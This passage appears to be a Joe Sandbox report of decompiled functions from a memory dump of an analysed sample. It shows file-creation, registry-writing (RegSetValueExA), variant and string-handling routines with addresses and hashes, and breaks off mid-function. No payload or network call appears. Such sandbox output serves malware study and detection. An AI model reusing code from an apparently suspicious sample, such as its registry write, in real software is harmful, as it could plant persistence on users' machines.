Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c9f3114ecd215452868b3c40e91c195a8893a75692548a428a7dabbf4a7cf2ad
Instruction ID: 6e13839fd6d086a42cbd3c1d6f2180466aad9c7349b6a486189bcb1526b2a3e4
Opcode Fuzzy Hash: c9f3114ecd215452868b3c40e91c195a8893a75692548a428a7dabbf4a7cf2ad
Instruction Fuzzy Hash: BD51C47D6012609FE716CF6CC988766BBD1AB45318F1885AEDC4CCB2D2E770C945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02865C24 Relevance: 4.6, APIs: 3, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E02865C24(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t51;
				void* _t65;
				void* _t66;
				intOrPtr _t70;
				intOrPtr _t72;
				char _t73;
				intOrPtr _t77;
				void* _t89;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t73 = __edx;
				_t66 = __ecx;
				_t91 = _t92;
				_t93 = _t92 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t93 = _t93 + 0xfffffff0;
					_t29 = E0285390C(_t29, _t91);
				}
				_t89 = _t66;
				_v5 = _t73;
				_t65 = _t29;
				_t87 = _a8;
				_push(_t91);
				_push(0x2865d6c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				if(_a8 != 0xffff) {
					E02865B1C(E02857D40(_t89, _t87 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02857F7C(_t89,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0285A75C(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t70 =  *0x28a2be4; // 0x2862fd4
						E0285B068(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
						E02853E5C();
					}
				} else {
					_t51 = CreateFileA(E02854964(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					E02865B1C(_t51, 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02857F7C(_t89,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0285A75C(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t72 =  *0x28a2e14; // 0x2862fcc
						E0285B068(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
						E02853E5C();
					}
				}
				_t27 = _t65 + 8; // 0x28638ec
				E028544F4(_t27, _t89);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(0x2865d73);
				return E028544C4( &_v40, 4);
			}

0x02865c24
0x02865c24
0x02865c25
0x02865c27
0x02865c2f
0x02865c32
0x02865c35
0x02865c38
0x02865c3d
0x02865c3f
0x02865c42
0x02865c42
0x02865c47
0x02865c49
0x02865c4c
0x02865c4e
0x02865c53
0x02865c54
0x02865c59
0x02865c5c
0x02865c64
0x02865cf4
0x02865cfd
0x02865d04
0x02865d0c
0x02865d0f
0x02865d1b
0x02865d23
0x02865d26
0x02865d30
0x02865d3d
0x02865d42
0x02865d42
0x02865c66
0x02865c80
0x02865c8b
0x02865c94
0x02865c9f
0x02865ca7
0x02865caa
0x02865cb6
0x02865cbe
0x02865cc1
0x02865ccb
0x02865cd8
0x02865cdd
0x02865cdd
0x02865c94
0x02865d47
0x02865d4c
0x02865d53
0x02865d56
0x02865d59
0x02865d6b

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02865D6C,?,?,028638E4,00000001), ref: 02865C80
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02865D6C,?,?,028638E4,00000001), ref: 02865CAE

Part of subcall function 02857D40: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,028638E4,02865CEE,00000000,02865D6C,?,?,028638E4), ref: 02857D8E

Part of subcall function 02857F7C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,028638E4,02865D09,00000000,02865D6C,?,?,028638E4,00000001), ref: 02857F9B

GetLastError.KERNEL32(00000000,02865D6C,?,?,028638E4,00000001), ref: 02865D13

Part of subcall function 0285A75C: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0285C3BD,00000000,0285C417), ref: 0285A77B

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 89e6adb25df23c9ab4e20b40ddae3b3edeba4acce340a42e85f65de9437578d8
Instruction ID: 87689ddc2874f374eebcc11e9c88e30772d17c26485d8406e6625208c15e6991
Opcode Fuzzy Hash: 89e6adb25df23c9ab4e20b40ddae3b3edeba4acce340a42e85f65de9437578d8
Instruction Fuzzy Hash: 0731447CA006149BDB10DFACC8847ADB7F6AB48704F908465E904E7381D77959058FA6

Uniqueness

Uniqueness Score: -1.00%

Function 0286C678 Relevance: 4.6, APIs: 3, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0286C678(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
				intOrPtr _v8;
				char _v12;
				int _t23;
				int _t24;
				char* _t26;
				char* _t28;
				void* _t29;
				void* _t31;
				void* _t40;
				intOrPtr _t45;
				void* _t49;

				_v12 = __ecx;
				_v8 = __edx;
				_t40 = __eax;
				E02854954(_v8);
				E02854954(_v12);
				E02854954(_a4);
				_push(_t49);
				_push(0x286c727);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49 + 0xfffffff8;
				RegOpenKeyA(_t40, E02854964(_v8), 0x28a6644); // executed
				_t23 = _a4;
				if(_t23 != 0) {
					_t23 =  *(_t23 - 4);
				}
				 *0x28a6648 = _t23;
				_t24 =  *0x28a6648; // 0x1c
				_t26 = E028549BC( &_a4);
				_t28 = E02854964(_v12);
				_t29 =  *0x28a6644; // 0x8a0
				RegSetValueExA(_t29, _t28, 0, 1, _t26, _t24);
				_t31 =  *0x28a6644; // 0x8a0
				RegCloseKey(_t31);
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(0x286c72e);
				E028544C4( &_v12, 2);
				return E028544A0( &_a4);
			}

0x0286c67f
0x0286c682
0x0286c685
0x0286c68a
0x0286c692
0x0286c69a
0x0286c6a1
0x0286c6a2
0x0286c6a7
0x0286c6aa
0x0286c6bc
0x0286c6c1
0x0286c6c6
0x0286c6cb
0x0286c6cb
0x0286c6cd
0x0286c6d2
0x0286c6db
0x0286c6e8
0x0286c6ee
0x0286c6f4
0x0286c6f9
0x0286c6ff
0x0286c706
0x0286c709
0x0286c70c
0x0286c719
0x0286c726

APIs

RegOpenKeyA.ADVAPI32(?,00000000,028A6644), ref: 0286C6BC
RegSetValueExA.ADVAPI32(000008A0,00000000,00000000,00000001,00000000,0000001C,00000000,0286C727), ref: 0286C6F4
RegCloseKey.ADVAPI32(000008A0,000008A0,00000000,00000000,00000001,00000000,0000001C,00000000,0286C727), ref: 0286C6FF

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: f6ef7576d91f7e26974a4690f02293ca6c9d7d7fc4dcfae9ae32d68bb0638f1f
Instruction ID: db5c6b296194e25c3b016d95575915de000c121ffd1f9ad3813e0b7dae65a790
Opcode Fuzzy Hash: f6ef7576d91f7e26974a4690f02293ca6c9d7d7fc4dcfae9ae32d68bb0638f1f
Instruction Fuzzy Hash: 40110DBC640224AFEB00EF6CC986AAD77EDEF08301F544465F915D72A1EB34E940DA55

Uniqueness

Uniqueness Score: -1.00%

Function 0285E348 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0285E348(signed short* __eax, void* __ecx) {
				void* _t7;
				signed short _t18;
				intOrPtr* _t19;

				_t12 = __eax;
				_t18 =  *__eax & 0x0000ffff;
				if(_t18 >= 0x14) {
					if(_t18 != 0x100) {
						if(_t18 != 0x101) {
							if((_t18 & 0x00002000) == 0) {
								_t7 = E02862E88(_t18, _t19);
								if(_t7 == 0) {
									L0285CDCC();
									L0285CDC4();
								} else {
									_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t19)) + 0x24))();
								}
							} else {
								_t7 = E0285E1CC(__eax);
							}
						} else {
							_t7 =  *0x28a629c();
						}
					} else {
						 *__eax = 0;
						_t7 = E028544A0( &(__eax[4]));
					}
				} else {
					_push(__eax); // executed
					L0285CDCC(); // executed
					_t7 = E0285E014(__eax);
				}
				return _t7;
			}

0x0285e34b
0x0285e34d
0x0285e354
0x0285e368
0x0285e37e
0x0285e38f
0x0285e39e
0x0285e3a5
0x0285e3b4
0x0285e3ba
0x0285e3a7
0x0285e3ae
0x0285e3ae
0x0285e391
0x0285e393
0x0285e393
0x0285e380
0x0285e382
0x0285e382
0x0285e36a
0x0285e36a
0x0285e372
0x0285e372
0x0285e356
0x0285e356
0x0285e357
0x0285e35c
0x0285e35c
0x0285e3c2

APIs

VariantClear.OLEAUT32(?), ref: 0285E357

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0744df7b6655635a0e8627c3c1622c81a062f9ba3761e29f1dd90c11f83ca045
Instruction ID: 3255acf3fa8f58da7a8ab272a564ee63f4221d2b850323e82952e39b149c89e4
Opcode Fuzzy Hash: 0744df7b6655635a0e8627c3c1622c81a062f9ba3761e29f1dd90c11f83ca045
Instruction Fuzzy Hash: 21F0C22D70423486C7107B3CCD846E93B9E9F40398748A426EC4BDB295CB348E05CB63

Uniqueness

Uniqueness Score: -1.00%

Function 02854D14 Relevance: 4.5, APIs: 3, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E02854D14(signed int __eax, void* __ecx, void* __edx) {
				void* _t4;
				signed int _t13;
				void* _t16;
				void* _t17;
				void* _t21;

				_t16 = __edx;
				_t3 = __eax;
				if(__ecx == 0) {
					_t17 =  *__eax;
					if(_t17 != 0) {
						 *__eax = 0;
						_push(__eax);
						L02851260();
						_t4 = _t17;
						return _t4;
					}
					return __eax;
				} else {
					_push(__eax);
					_push(__ecx);
					_push(__edx); // executed
					L02851250(); // executed
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t21 = _t16;
						_t13 = _t3 & 0x0000007f;
						if( *0x28a3008 != 0) {
							 *0x28a3008();
						}
						if(_t13 != 0) {
							if(_t13 <= 0x18) {
								_t2 = (_t13 & 0x000000ff) + 0x2877738; // 0xd7c9c8cc
								_t13 =  *_t2 & 0x000000ff;
							}
						} else {
							_t13 =  *(E028564E4() + 4);
						}
						return E02852CE8(_t21);
					} else {
						_pop(__edx);
						_push( *__edx);
						 *__edx = __eax;
						L02851260();
						return __eax;
					}
				}
			}

0x02854d14
0x02854d14
0x02854d16
0x02854c24
0x02854c28
0x02854c2a
0x02854c30
0x02854c32
0x02854c37
0x00000000
0x02854c37
0x02854c38
0x02854d1c
0x02854d1c
0x02854d1d
0x02854d1e
0x02854d1f
0x02854d26
0x02852d40
0x02852d43
0x02852cf6
0x02852cfa
0x02852d04
0x02852d0a
0x02852d0a
0x02852d12
0x02852d24
0x02852d29
0x02852d29
0x02852d29
0x02852d14
0x02852d19
0x02852d19
0x02852d3c
0x02854d2c
0x02854d2c
0x02854d2d
0x02854d2f
0x02854d31
0x02854d36
0x02854d36
0x02854d26

APIs

SysFreeString.OLEAUT32(0286C78C), ref: 02854C32
SysAllocStringLen.OLEAUT32(?,?), ref: 02854D1F
SysFreeString.OLEAUT32(00000000), ref: 02854D31

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
Instruction ID: 30e5b66b01983549ed636af3cb2a6be0df377cdae8ca83b015e2f5fbae326e8c
Opcode Fuzzy Hash: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
Instruction Fuzzy Hash: 2FE0ECBC1052256EFB146F248844B3A326AAFC1746B944499EC08CA154DB749881AE36

Uniqueness

Uniqueness Score: -1.00%

Function 028670D4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E028670D4(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed char* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				char _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				signed int _v48;
				signed int _v52;
				signed int* _v56;
				signed int* _v60;
				signed int _v64;
				signed int* _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v1620;
				signed int _t140;
				intOrPtr _t141;
				intOrPtr* _t142;
				intOrPtr _t145;
				signed char _t153;
				signed char _t154;
				signed int* _t161;
				signed int _t203;
				signed int _t204;
				void* _t205;
				intOrPtr _t219;
				intOrPtr _t220;
				intOrPtr _t221;
				signed int _t250;
				intOrPtr _t251;
				signed char* _t253;
				void* _t256;
				void* _t257;
				intOrPtr _t258;
				void* _t272;

				_t272 = __fp0;
				_t256 = _t257;
				_t258 = _t257 + 0xfffff9b0;
				_v44 = __ecx;
				_t253 = __edx;
				_v40 = __eax;
				_t219 =  *0x285cd60; // 0x285cd64
				E02854F04( &_v36, _t219);
				_push(_t256);
				_push(0x28673ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_v52 = 0;
				_t207 = 0;
				_push(_t256);
				_push(0x28673dc);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t258;
				_t250 =  *(__edx + 1) & 0x000000ff;
				if(_t250 > 0x40) {
					_t207 =  *0x28a2c9c; // 0x2866a08
					E0285B02C(_t207, 1);
					E02853E5C();
				}
				if(_t250 == 0) {
					L25:
					_v84 =  &_v1620;
					_v80 = _v44 + 4;
					_v76 = _t250;
					_v72 = _t253[2] & 0x000000ff;
					_t220 =  *_v44;
					_t140 =  *_t253 & 0x000000ff;
					if(_t140 != 4) {
						__eflags = _t140 - 1;
						if(__eflags == 0) {
							__eflags = _t250;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t140 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t140 = 8;
						}
						 *_v44 = 0xfffffffd;
						_v80 = _v80 - 4;
						_v72 = _v72 + 1;
					}
					_push(0);
					_push( &_v36);
					_push(_a4);
					_t210 =  &_v84;
					_push( &_v84);
					_push(_t140);
					_push(0);
					_t141 =  *0x28a2cdc; // 0x2877a04
					_push(_t141);
					_push(_t220);
					_t142 = _v40;
					_push(_t142);
					if( *((intOrPtr*)( *_t142 + 0x18))() != 0) {
						E028676AC();
					}
					_t203 = _v52;
					if(_t203 == 0) {
						L39:
						_t145 = 0;
						_pop(_t221);
						 *[fs:eax] = _t221;
						_push(0x28673e3);
						_t204 = _v52;
						if(_t204 == 0) {
							L41:
							return _t145;
						} else {
							goto L40;
						}
						do {
							L40:
							_t204 = _t204 - 1;
							_t145 =  *((intOrPtr*)(_t256 + _t204 * 8 - 0x250));
							_push(_t145);
							L0285CDB4();
						} while (_t204 != 0);
						goto L41;
					} else {
						do {
							_t203 = _t203 - 1;
							_t254 = _t256 + _t203 * 8 - 0x250;
							_t251 =  *((intOrPtr*)(_t256 + _t203 * 8 - 0x250 + 4));
							_t268 = _t251;
							if(_t251 != 0) {
								E02855350( *_t254, _t210, _t251, _t268);
							}
						} while (_t203 != 0);
						goto L39;
					}
				} else {
					_v56 = _a8;
					_v60 = _t256 + (_t250 + _t250) * 8 - 0x650;
					_t205 = 0;
					do {
						_v60 = _v60 - 0x10;
						_t153 = _t253[_t205 + 3] & 0x000000ff;
						_v48 = _t153 & 0x7f;
						_t154 = _t153 & 0x00000080;
						if(_v48 != 0xa) {
							__eflags = _v48 - 0x48;
							if(_v48 != 0x48) {
								__eflags = _t154;
								if(_t154 == 0) {
									__eflags = _v48 - 0xc;
									if(_v48 != 0xc) {
										 *_v60 = _v48;
										_v60[2] =  *_v56;
										__eflags = _v48 - 5;
										if(_v48 >= 5) {
											__eflags = _v48 - 7;
											if(_v48 <= 7) {
												_t93 =  &_v56;
												 *_t93 =  &(_v56[1]);
												__eflags =  *_t93;
												_v60[3] =  *_v56;
											}
										}
									} else {
										__eflags =  *_v56 - 0x100;
										if( *_v56 != 0x100) {
											_t161 = _v56;
											 *_v60 =  *_t161;
											_v60[1] = _t161[1];
											_t207 = _v60;
											_v60[2] = _t161[2];
											_v60[3] = _t161[3];
											_v56 =  &(_v56[3]);
										} else {
											_v68 = _t256 + _v52 * 8 - 0x250;
											 *_v68 = E02855374(_v56[2], _t207);
											_v68[1] = 0;
											 *_v60 = 8;
											_v60[2] =  *_v68;
											_v52 = _v52 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v48 - 0xc;
								if(_v48 == 0xc) {
									__eflags =  *( *_v56) - 0x100;
									if( *( *_v56) == 0x100) {
										_t207 = 8;
										E0285EABC( *_v56, 8,  *_v56, _t250, _t272);
									}
								}
								 *_v60 = _v48 | 0x00004000;
								_v60[2] =  *_v56;
								goto L23;
							} else {
								_v64 = _t256 + _v52 * 8 - 0x250;
								__eflags = _t154;
								if(_t154 == 0) {
									 *_v64 = E02855374( *_v56, _t207);
									__eflags = 0;
									 *(_v64 + 4) = 0;
									 *_v60 = 8;
									_v60[2] =  *_v64;
								} else {
									 *_v64 = E02855374( *( *_v56), _t207);
									 *(_v64 + 4) =  *_v56;
									 *_v60 = 0x4008;
									_v60[2] = _v64;
								}
								_v52 = _v52 + 1;
								L23:
								_t98 =  &_v56;
								 *_t98 =  &(_v56[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v60 = 0xa;
							_v60[2] = 0x80020004;
						}
						L24:
						_t205 = _t205 + 1;
					} while (_t250 != _t205);
					goto L25;
				}
			}

0x028670d4
0x028670d5
0x028670d7
0x028670e0
0x028670e3
0x028670e5
0x028670eb
0x028670f1
0x028670f8
0x028670f9
0x028670fe
0x02867101
0x02867106
0x02867109
0x0286710b
0x0286710c
0x02867111
0x02867114
0x02867117
0x0286711e
0x02867120
0x0286712d
0x02867132
0x02867132
0x02867139
0x02867300
0x02867306
0x0286730f
0x02867312
0x02867319
0x0286731f
0x02867321
0x02867327
0x02867351
0x02867354
0x02867356
0x02867358
0x0286735a
0x0286735e
0x02867360
0x02867360
0x0286735e
0x02867358
0x02867329
0x02867338
0x0286733a
0x0286733a
0x02867342
0x02867348
0x0286734c
0x0286734c
0x02867365
0x0286736a
0x0286736e
0x0286736f
0x02867372
0x02867373
0x02867374
0x02867376
0x0286737b
0x0286737c
0x0286737d
0x02867380
0x02867388
0x0286738d
0x0286738d
0x02867392
0x02867397
0x028673b5
0x028673b5
0x028673b7
0x028673ba
0x028673bd
0x028673c2
0x028673c7
0x028673db
0x028673db
0x00000000
0x00000000
0x00000000
0x028673c9
0x028673c9
0x028673c9
0x028673ca
0x028673d1
0x028673d2
0x028673d7
0x00000000
0x02867399
0x02867399
0x02867399
0x0286739a
0x028673a1
0x028673a4
0x028673a6
0x028673ac
0x028673ac
0x028673b1
0x00000000
0x02867399
0x0286713f
0x02867142
0x02867150
0x02867153
0x02867155
0x02867155
0x02867159
0x02867166
0x02867169
0x0286716f
0x02867189
0x0286718d
0x02867203
0x02867205
0x0286724c
0x02867250
0x028672cb
0x028672d5
0x028672d8
0x028672dc
0x028672de
0x028672e2
0x028672e4
0x028672e4
0x028672e4
0x028672f0
0x028672f0
0x028672e2
0x02867252
0x02867255
0x0286725a
0x0286729a
0x028672a2
0x028672aa
0x028672b0
0x028672b3
0x028672bc
0x028672bf
0x0286725c
0x02867266
0x02867277
0x0286727e
0x02867284
0x02867292
0x02867295
0x02867295
0x0286725a
0x00000000
0x02867250
0x02867207
0x0286720b
0x02867212
0x02867217
0x02867225
0x0286722a
0x0286722a
0x02867217
0x0286723a
0x02867244
0x00000000
0x0286718f
0x02867199
0x0286719c
0x0286719e
0x028671dd
0x028671e2
0x028671e4
0x028671ea
0x028671f8
0x028671a0
0x028671af
0x028671b9
0x028671bf
0x028671cb
0x028671cb
0x028671fb
0x028672f3
0x028672f3
0x028672f3
0x028672f3
0x00000000
0x028672f3
0x02867171
0x02867174
0x0286717d
0x0286717d
0x028672f7
0x028672f7
0x028672f8
0x00000000
0x02867155

APIs

SysFreeString.OLEAUT32(?), ref: 028673D2

Strings

H, xrefs: 02867189

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 1b37cd4283f3c3b8d6a4845380b80d315cfce02897e5214ceb04d61f6dc0dcc6
Instruction ID: 2e93246c1cd76cb6082b4124055f676add8de85276f0f92099e5dfc82a0b4c3c
Opcode Fuzzy Hash: 1b37cd4283f3c3b8d6a4845380b80d315cfce02897e5214ceb04d61f6dc0dcc6
Instruction Fuzzy Hash: DAB1D578A016089FDB10CF99D584AADFBF2FF49318F148169E809EB365D734A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0285E744 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0285E744(signed short* __eax, void* __ecx, signed short* __edx) {
				intOrPtr* _v16;
				void* _t15;
				signed short* _t23;
				signed short _t34;
				signed short* _t35;
				void* _t36;

				_t12 = __eax;
				_push(__ecx);
				_t35 = __edx;
				_t23 = __eax;
				if(( *__eax & 0x0000bfe8) != 0) {
					_t12 = E0285E348(__eax, __ecx);
				}
				_t34 =  *_t35 & 0x0000ffff;
				if(_t34 >= 0x14) {
					if(_t34 != 0x100) {
						if(_t34 != 0x101) {
							if((_t34 & 0x00002000) == 0) {
								if(E02862E88(_t34, _t36) == 0) {
									_push(_t35);
									_push(_t23);
									L0285CDD4();
									_t15 = E0285E014(_t14);
								} else {
									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
								}
							} else {
								_t15 = E0285E570(_t23, 0x285e73c, _t35);
							}
						} else {
							 *_t23 = _t34;
							_t23[4] = _t35[4];
							_t15 =  *0x28a62a4();
						}
					} else {
						 *_t23 = 0x100;
						_t23[4] = 0;
						_t4 =  &(_t23[4]); // 0x8
						_t15 = E028544F4(_t4, _t35[4]);
					}
				} else {
					_push(_t35);
					_push(_t23); // executed
					L0285CDD4(); // executed
					_t15 = E0285E014(_t12);
				}
				return _t15;
			}

0x0285e744
0x0285e747
0x0285e748
0x0285e74a
0x0285e751
0x0285e755
0x0285e755
0x0285e75a
0x0285e761
0x0285e776
0x0285e794
0x0285e7ae
0x0285e7cb
0x0285e7de
0x0285e7df
0x0285e7e0
0x0285e7e5
0x0285e7cd
0x0285e7d9
0x0285e7d9
0x0285e7b0
0x0285e7b9
0x0285e7b9
0x0285e796
0x0285e796
0x0285e79c
0x0285e7a1
0x0285e7a1
0x0285e778
0x0285e778
0x0285e77f
0x0285e782
0x0285e788
0x0285e788
0x0285e763
0x0285e763
0x0285e764
0x0285e765
0x0285e76a
0x0285e76a
0x0285e7ee

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0285E765

Part of subcall function 0285E348: VariantClear.OLEAUT32(?), ref: 0285E357

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: f2c9c445b7b70306ac46cbf5d15be222f2ef307eeb87940c906870e91de55256
Instruction ID: 334dcfd48bd660353f83f4900fa6bcc26500b9916c37e66da238de8982fb476f
Opcode Fuzzy Hash: f2c9c445b7b70306ac46cbf5d15be222f2ef307eeb87940c906870e91de55256
Instruction Fuzzy Hash: 7511C22CB0023487CB20AF38CDC466A27DAEF843547148466EE4ECF215DB30CE01CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0285E3E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0285E3E0(intOrPtr _a4, signed short* _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				char* _v12;
				char _v28;
				void* __ebp;
				signed int _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t54;
				signed short* _t56;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t74;

				_t71 = _t73;
				_t74 = _t73 + 0xffffffe8;
				_t56 = _a8;
				if( *_t56 != 0x400c) {
					__eflags = _a4;
					if(_a4 != 0) {
						_push( &_v28);
						L0285CDC4();
						_v12 =  &_v28;
					} else {
						_v12 = 0;
					}
					_push(_t71);
					_push(0x285e4d4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t74;
					_t68 =  *_t56 & 0x0000ffff;
					_t27 =  *_t56 & 0xffff;
					__eflags = _t27 - 0x101;
					if(__eflags > 0) {
						_t28 = _t27 - 0x4009;
						__eflags = _t28;
						if(_t28 == 0) {
							goto L12;
						} else {
							__eflags = _t28 != 4;
							if(_t28 != 4) {
								goto L14;
							} else {
								goto L12;
							}
						}
					} else {
						if(__eflags == 0) {
							L12:
							__eflags =  *0x28a6298;
